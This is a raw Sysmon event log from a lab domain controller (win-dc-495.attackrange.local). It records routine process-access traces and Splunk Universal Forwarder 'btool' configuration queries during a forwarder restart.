13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+13ac4|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003540Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003539Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.545{59A5CD1D-8EE2-6005-AC00-00000000A301}22962440C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.546{59A5CD1D-8EE2-6005-AD00-00000000A301}3920C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AC00-00000000A301}2296C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 